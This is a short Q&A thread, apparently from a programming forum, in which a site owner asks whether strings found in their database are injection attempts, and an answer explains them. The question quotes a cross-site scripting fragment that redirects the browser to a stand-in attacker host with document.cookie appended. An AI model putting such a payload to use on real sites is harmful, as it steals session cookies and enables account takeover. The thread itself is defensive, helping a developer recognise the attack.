# Cross Site Attacks lookalike in my database

Tags: php, code-injection, cross-site

I just found something in my database that look like they might be injection attemps. I'm wondering if they might be doing anything malicious to my database or not. Thanks.

```
Your search for 'flowers evil_script()' returned the following results:evil_script()' returned the following results
Window.location='http:attacker?cookie='+document.cookie.
```

Answer (score 1, accepted):

@jessica, to me it looks like the script is trying to redirct a user to the attackers site along with a cookie. This *could* be used to try and steal the session cookie of the user and essentially login as that user.

If the user effected is an administrator or someone with elevated privileges, the attacker would have the same rights as that user.

I'd be curious if you could find the actual script somewhere in your database (site files) or if someone just performed a search on your site and got an error.

Was this found in a logging table?

Comment: I store everything users type and entered into the textarea and store it in my database. But I also strip tags, and escape strings, and other things that needed to be escaped before inserting them into my database. That must be why only the string part of it shown up. Just making sure that it's not doing anything malicious to my database and trying to find out what it meant. Thanks.